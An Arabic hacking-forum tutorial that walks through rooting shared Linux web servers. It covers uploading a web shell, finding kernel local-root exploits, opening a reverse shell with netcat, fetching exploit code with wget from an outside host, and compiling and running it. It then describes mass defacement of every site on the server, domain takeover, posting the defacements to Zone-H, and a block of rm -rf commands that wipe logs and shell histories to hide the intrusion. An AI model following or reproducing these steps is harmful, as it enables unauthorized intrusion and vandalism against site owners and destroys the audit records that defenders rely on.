عدد النقاط : 10
[align=center]=X-MaN HaCk3r T34M Is HeaR ViRuS Qalaa ===================== اهلا وسهلا بكم ياعناكب في موضوع حول الروت من البداية الى نهاية (Root in server) :00001793[1]: في بداية الامر سوف ينقسم هذا الموضوع الى 1-ماهو الروت 2-كيف يمكن الحصول على الروت 3-اللوكل المناسب وكيف البحث عنة 4-اتصال بلسيرفر بكل الطريق 5-الحصول على الروت 6-ماذا بعد الروت 7-سحب الدومنين 8-عمل ماس ديفس 9-التسجيل فى الزون اتش المواقع المخترقة 10-مسح اثارك من السيرفر ========================== قبل ان نبدأ الموضوع اريد اعطيكم مقدمة بسيطة بسبب كتابتي هذا الموضوع اخوان لاحضت ان السيرفرات هذا الايام تعطي صلاحية يوزر والاوامر اظهار اليوزرات المواقع ممنوعة خاصتا السيرفرات تحديث 2009 لذلك الشباب يرفع انديكس وبروح ولا يفكر بلروت ابدأ المهم اعتقد ان هناك نظام حماية جديد بلسيرفرات او هو قانون جديد حيث يعطونك صلاحية يوزر على الموقع لي انتة رافع شل ولايعطونك صلاحية نوبدي (اعتقد ان صلاحية نوبدي انقرضت:a23لذلك يخلونك تخترق الموقع ولا يسمحون بختراق المواقع الباقية على السيرفر الان نبدأ بلدرس ~ :41: ________________________________ 1-ماهو الروت: الروت هو اعلى صلاحية في السيرفر لينكس واذا حصل شخص على صلاحية الروت يكون السيرفر كلة في خطر تام كيف يكون السيرفر في خطر انة اقول لك يمكن بعد الحصول على الروت يمكن تسحب الدومنينات المواقع ويمكن تغير جميع انديكسات الموقع بأنديكس اختراق وهذا مايسمى بلــــماس ديفس وراح اشرح في الفقرات التالية وذا حصلت على الروت يكون السيرفر ملكك وهنا فهمنا ماهو الروت واكيد لي يريد يأخذ روت لازم يعرف ماهو الروت اصلا ويكون لدية خبرة في اختراق المواقع :088: 2-كيف يمكن الحصول على الروت(Root in server): هناك طرق كثيرة في الحصول على الروت وسوف اذكر اهم الطرق وهي...) 1-عن طريق اللوكل روت وهي استغلال ثغرة في بكرنيل السيرفر ,وحسب اصدار الكرنيل 2-عن طريق استغلال ثغرات البرنامج لي على السيرفر 3-عن طريق قرأة الملفات لي يكون فية باسورد الروت << وعتقد ان هناك درس في دورة sql كيف اخذ باسورد الروت وهم طريقة والطريقة الشائعة الان هي طريقة اللوكل الروت واصدار الكرنيل لان نشرح هذة الطريقة لكل سيرفر كرنيل واصدار لهذا الكرنيل والهكر الكبار مثلي smilies8 هههههه يجدون ثغرة لهذا الاصدار الكرنيل وينقلون هذة الثغرة في اصدار الكرنيل الى مواقع السيكورتي واحنة نستغل هذة الثغرة ومايسمى بلوكل روت وعن طريق الاستغلال هذة الثغرة في السيرفر نحصل على الروت وان شاء الله اشرح لكم الطرق الباقية بأذن الله :Great: 3-اللوكل المناسب وكيف البحث عنة: في البداية لنعرف ماهو لوكل الروت :برنامج مبرمج لستغلال ثغرة في اصدار الكرنيل ولوكلات مبرمجة بلغة c وهناك لوكلات مترجمة وذا كان اللوكل مبرمجة بلغة c يحتاج لها ترجمة قبل التشغيل وسوف اشرح لكم في الفقرات التالية بس كيف نفرق بين المترجم والغير مترجم انة اقول لك اذا لوكل منتهي بمتداد c فانة غير مترجم ويحتاج ترجمة واذا لوكل منتهي بغير امتداد او اي امتداد اخر فانة مترجم بس لماذا اللوكل دائما بلغة c لان نوة الكرنيل في نضام لينكس تكون مبرمجة بلغة c شفتوا لازم تتعلموا لينكس لانهو يفيدكم كثيرا :etonnement-29[1]: الان كيف نعرف لوكل المناسب لنا وكيف نقوم بلبحث عنة قي البداية عندما ترفع الشل على السيرفر نقوم بتنفيذ الامر التالي (uname -a) او يمكن رؤية اصدار الكرنيل في بداية الشل كما في الصورة التالية اصدار الكرنيل : الي بلون الاخضر ذا اصدار الكرنيل ولي بلون الازرق ذا النحديث نواة الكرنيل او يمكن تنفيذ الامر التالي uname -a ايظا ليظهر لك اصدار لوكل الان نريد كيف نبحث على هذا اصدار الكرنيل نريد لة لوكل روت كيف اولا:عن طريق الاخ قوقل كيف تروح لقوقل وتكتب local root xxx حيث xxx نضع بدلة اصدار الكرنيل او local root exploit xxx حيث xxx اصدار الكرنيل نضعة بدلة ولازم تعرف تحديث الكرنيل مثيل 2009 او 2010 لان كل لوكل يختلف في التحديث ثانيا:عن طريق مواقع السكيورتي سوف اشرح على اهم موقع لان والاقوى هذا الموقع http://www.exploit-db.com كما في الصورة التالية في البحث ونكتب في البحث كذا localroot xxx حيث xxx نضع بدلة اصدار الكرنيل وتختار النوع وان شاء الله راح تحصل على لوكل روت المناسب وهذا مواقع لبحث على لوكل كود PHP: http://www.exploit-db.com http://www.milw0rm.com/local.php http://www.kernel.org/pub/linux http://www.securityfocus.com http://rmccurdy.com/scripts/downloaded/localroot/ http://hba.by.ru/ http://th3-0utl4ws.com/localroot/ 4-اتصال بلسيرفر بكل الطريق: اهم يشيء بعد الحصول على لوكل روت هو الاتصال بلسيرفر يعني اذا ماتصلنة بلسيرفر ماراح نحصل على روت والاتصال بلسيرفر يعني بدل ماتروح لشل تروح لشلشة الدوس وتنفذ الاوامر وهناك طرق كثير لاتصال بلسيرفر وهناك موضوع لاخ فالكوني يشرح هذة الاتصال بثلاثة طرق وهذا رابط الموضوع شرح الاتصال العكسي باعقد السيرفرات بثلاث طرق والاتصال ينجح باذن الله وانة راح اشرح لكم طريقة رابعة لي مايستطيع فتح بورت في جهازة مثلي هناك طرق كثيرة لتسجيل في موقع ريلاكس البخيل smilies13 ماني راح اشرح انتة احصل على حساب والان بعد الحصول على حساب والان بعد الحصول على الحساب يمكنك ان تتصل وانشاء اتصال VPN الان سوف اشرح لكم الاتصال بلسيرفر بعد ماعملة اتصال VPN يلا نبدأ على بركة الله في البداية الأمر نحمل هذة الاداة وهي netcat اضغط هنا نفك الضغط عنها ونضعها على مسار الهارد c او اي هارد انتة واضع الوندوز فية الان كل شيء تمام نحمل هذا الشل وهو شل Egy_Spider العربي الاصدار الثاني القوى والافضل والاروع لحد الان في سنة 2010 الجديد كليا اضغط هنا نرفع الشل على موقع المصاب او الموقع لي انتة تريد الحصول علية على روت اوكي الان نذهب الى الدوس كما في الصورة start>>Run>>cmd تم الدخول لــــ Dos http://up.ma/images/b0h9zwhlnwqwujh8g81u.png ونضع الامر التالي cd\ وبعد ذلك ندخل الى حافظة النت كات بلأمر cd netcat http://up.ma/images/1d0t62dgbmika2o4nglv.png تم الدخول اوكي كل شيء تمام الان نذهب الى هذا الموقع http://www.ip-adress.com لمعرفة ip الخاص فينة الان نذهب الى الشل لي احنة رافعينة على الموقع الى اخر الشل 1-ip لي احنة طلعناة من الموقع لي فوق 2-البورت وراح نستخدم بورت 443 البورت الخاص في اتصال ريلاكس 3-لانغير شيء 4-لاتضغ الان بعد قليل من اقول لك الان كل شيء تمام نرجع الى النت كات ونكتب الامر nc -vlp port مع تغير port الى 443 بورت اتصال ريلاكس الان نضغط انتر (enter) ونذهب الى الشل ونضغط رقم اربعة وهو (Connect) الان تم الاتصال بلشل الان انتهينة من هذة الخطوة الحمد لله 5-الحصول على الروت: بعد ما اتصلنة بلسيرفر ووجدنة اللوكل المناسب الان نريد سحب الروت على السيرفر اول شيء لحصول على الروت هو سحب لوكل على الموقع ويقصل ان يكون المجلد يحمل تصريح 777 ويسحب اللوكل بامر wegt www.viers.com/localroot.zip wegt<<<الامر السحب www.viers.com/local.zip<<<موقع لوكل او انتة ترفع لوكل على اي موقع مجاني ويفض لوكل بمتداد zip الان تم السحب نفط الضغط بامر unzip local.zip unzip<<<امر فك الضغط local.zip<<<اسم لوكل مع الامتداد الان نعطي لوكل تصريح 777 بامر chmod 777 local.c chmod<<<امر تغير تصريح اي ملف 777<<<رقم التصريح local.c<<<لوكل بعد ذلك نترجم اللوكل بامر التالي gcc local.c –o local بعد سوف تجد لوكل بدون امتداد هكذا local بعد ذلك نعطي اللوكل المترجم تصريح 777 بامر التالي chmod 777 local بعد ذلك نشغل اللوكل بامر local ./ وسوف يشتغل لوكل نقوم بتنفيذ الامر التالي لرؤية الاصلاحية الان id الان صلاحيتنة روت ننفذ لامر التالي su لحصول على صلاحية روت كاملة وهذا شرح لحصول على الروت اضغط هنا الحقوق محفوضة لــــ SnakE1095 لكن هناك لوكلات مختلفة يراد لة عمل مختلف لكن اذا تريد تحترف في اخذ روت واي سيرفر يقابلك تأخذ روت وتتجاوز اي معوق امامك علية اذان حمل كل هذة الدرس قي الموضوع التالي اضغط هنا 6-ماذا بعد الروت: بعد الروت ماذا تفعل اممممم تعرف كل شيء تستطيع ان تفعلة مثل سحب الدومينات المواقع ورفع الانديكس على الموقع على السيرفر ومايسمى (بلماس ديفس) وتستطيع سحب الباسوردات المواقع وسحب السي بنلات المواقع بختصار كل شيء تسطتيع ان تفعل مسح تعديل على المواقع وغيرة لكن انة سوف اشرح لكم اهم الاشياء بلـــروت ودائما الهكر تفعلة وهي عمل ماس ديفس وهي تغير جميع انديكسات السيرفرات الى انديكس الاختراق وسحب الدومينات السيرفر ..الخ 7-سحب الدومنين : راح اعطيكم شرح فيديوا لسحب الدمنين المواقع على السيرفر الحقوق او الطريق محفوظة لمنتديات القراصنة السعودية اضغط هنا لتحميل 8-عمل ماس ديفس: الماس الديفس الفائدة من هو تغير جميع صفحات المواقع لي على السيرفر الى انديكس الاختراق بدل ماتروح لموقع موقع وتغير الانديكس مثلا يوجد انديكس في مجلد وفية مجلد اخر داخل هذا المجلد وفية index.html يقوم بتغيرة منة هنا تأتي الفائدة من هذة السكريب طبعا السكريب بلغة البيرل perl وهنا شرح فيديوا لعمل ماس ديفس + السكريب لعمل ماس ديفس اضغط هنا لتحميل جميع الحقوق محفوضة لصاحب الشرح 9-التسجيل فى الزون اتش المواقع المخترقة : بعد ماتقوم بعمل ماس ديفس وتغير جميع الانديكسات الموقع وتريد سجل اختراق المواقع لي على السيرفر في زون اتش والمواقع لي على السيرفر 250 موقع كيف اذا سجل الاختراق تأخذ واحد واحد بس هاي العملية طويلة ومجهدة لذلك اتى سكريب بلغة البيريل يسجل اخترقاتك في الزون اتش بدقيقة وهذا شرح موجود في المنتدى سكربت للتسجيل بالزون إتش 10-مسح اثارك من السيرفر: بعد عمل ماس ديفس لازم نقوم بمسح اثارك على السيرفر ويوجد بياناتك في ملف اسمة لوقل هسة تقول لي ماهو ملف لوقل هو ملف يقوم بحفظ اي بي تبعك واثاراك على السيرفر طيب كيف نمسحة انة اقول لك بمجموعة من الأوامر تنفذة على السيرفر وسوف ينمسح ملف لوقل بأذن الله وهذة الأوامر:قم بتنفيذ بعد الحصول على صلاحية الروت وعمل ماس ديفس *_* كود PHP: rm -rf /tmp/logs rm -rf $HISTFILE rm -rf /root/.ksh_history rm -rf /root/.bash_history rm -rf /root/.ksh_history rm -rf /root/.bash_logout rm -rf /usr/local/apache/logs rm -rf /usr/local/apache/log rm -rf /var/apache/logs rm -rf /var/apache/log rm -rf /var/run/utmp rm -rf /var/logs rm -rf /var/log rm -rf /var/adm rm -rf /etc/wtmp rm -rf /etc/utmp find / -name *.bash_history -exec rm -rf {} \; find / -name *.bash_logout -exec rm -rf {} \; find / -name "log*" -exec rm -rf {} \; find / -name *.log -exec rm -rf {} \; تم الشرح بواسطة: ViRuS Qalaa جميع الحقوق محفوظة smilies11 [gdwl] ملاحظة بسيطة حول الموضوع: :a11: اخوان والله والله تعبت على هذا الموضوع لذلك ارجوا منك التقيم + الردود استطيع ان اخفي الروابط ولاترها الا بعد الرد لكن الاخفاء الروابط يشوة الموضوع لذلك الرجاء التقم والردود وشكرا لكم وتحياتي لكم وان شاء الله ان يكون الموضوع رائع وجميل والفائدة لكم ان شاء الله ولاتنسى الدعاء لي ولوالدية *_* :a07: وفي الختام prayer سلام :sossa: [/gdwl][/align] المصدر: :: vBspiders Professional Network ::|Zhgv,j jpj hgl[ivZ|
http://www.exploit-db.com http://www.milw0rm.com/local.php http://www.kernel.org/pub/linux http://www.securityfocus.com http://rmccurdy.com/scripts/downloaded/localroot/ http://hba.by.ru/ http://th3-0utl4ws.com/localroot/
rm -rf /tmp/logs rm -rf $HISTFILE rm -rf /root/.ksh_history rm -rf /root/.bash_history rm -rf /root/.ksh_history rm -rf /root/.bash_logout rm -rf /usr/local/apache/logs rm -rf /usr/local/apache/log rm -rf /var/apache/logs rm -rf /var/apache/log rm -rf /var/run/utmp rm -rf /var/logs rm -rf /var/log rm -rf /var/adm rm -rf /etc/wtmp rm -rf /etc/utmp find / -name *.bash_history -exec rm -rf {} \; find / -name *.bash_logout -exec rm -rf {} \; find / -name "log*" -exec rm -rf {} \; find / -name *.log -exec rm -rf {} \;
|Zhgv,j jpj hgl[ivZ|